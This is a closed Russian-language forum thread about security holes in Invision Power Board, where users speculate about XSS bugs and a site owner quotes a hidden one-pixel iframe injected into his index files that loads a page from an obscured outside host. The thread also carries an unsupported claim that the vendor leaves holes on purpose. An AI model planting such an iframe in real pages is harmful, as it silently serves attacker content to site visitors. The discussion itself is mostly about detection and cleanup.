Поиск дырок в IPB.

Статус
В этой теме нельзя размещать новые ответы.

pomor

Писатель
Регистрация
19 Фев 2007
Сообщения
3
Реакции
0
Все в курсе что дырки есть. Все заплатки что найдены на оффициальных стараницах уже поставил. Но я предполагаю, что это все появляется всегда с некоторым запозданием. Предлагаю поделиться експлойтами, не ради хака самого, но ради ну его к черту !
 
Могу сказать лишь одно...
Последния версия бажная! И во ВСЕХ версиях есть xss-бага
Это какая ? Судя по твоему сообщению ты про 2.2.2 говоришь..
Баги есть во всех версиях, и будут всегда! Просто их находят само собой позже чем выходит сама версия.. Это необратимый процесс ) Весь вопрос в том кто быстрее найдет дыру, атакующий или защищающий ;)
 
угу, а баги скорее всего уже есть, просто будут сидеть в привате месяцок.. а потом на секлаб скинут, после поимения 90% бажных ипб.. ))
 
# for all - Моё мнение, что все должны понимать, что сама компания, которая разрабатывает IPB, сама же оставляет дыры, так как им же тоже надо, чтобы люди постоянно покупали новые версии...

P.S. -> Если компания разработчиков сделаем всё один раз, то тогда кто будет покупать новые версии а ? =)
 
могу сказать что есть сейчас xss в аяксовом изменение темы... т.е. использовать можно если ты модер на форуме... это на 2.1.х
 
ребята, помогите советом

обнаружил у себя на паре форумов во всех index.html и в index.php такой вот код

<!-- ~ --><iframe width=1 height=1 border=0 frameborder=0 src="http://XXXX.org/exp/index.php"></iframe><!-- ~ -->

как я понял - это сделали через какуето дыру?

1) что это за дыра?
2) как ее закрыть?
3) какой максимальный вред от этого кода? (понимаю что все зависит от кода в ифрейме)

всем заранее спасибо

ЗЫ проверьте и ваши ресурсы - наверняка найдете подобное
 
>>1) что это за дыра?

это могло быть и не через дыру, а прийти вместе с нуленой версией

>>3) какой максимальный вред от этого кода? (понимаю что все зависит от кода в ифрейме)

открой этот адрес (_ttp://XXXX.org/exp/index.php) и посмотри что там будет. ;) Вполне возможно, что ты просто накручиваешь кому то показы
 
обнаружил у себя на паре форумов во всех index.html и в index.php такой вот код
Это обсуждается уже давно, дело не в IPB. Подобные фреймы появляются в любых скриптах и проcто в HTML страницах. Антвирь молчит?
 
Это обсуждается уже давно, дело не в IPB. Подобные фреймы появляются в любых скриптах и проcто в HTML страницах. Антвирь молчит?
Да нет. iframe может служить индикатором взлома, судя по ibresource.ru Встроенный в 2.1.7 антивирь вообще в основном по ифрейму проверяет. А дырку, через которое это могли замутить, проще всего определить по версии форума.
 
фреймы появляются в любых скриптах и проcто в HTML страницах. Антвирь молчит?
антивирь тут не показатель к сожалению
 
Статус
В этой теме нельзя размещать новые ответы.
Назад
Сверху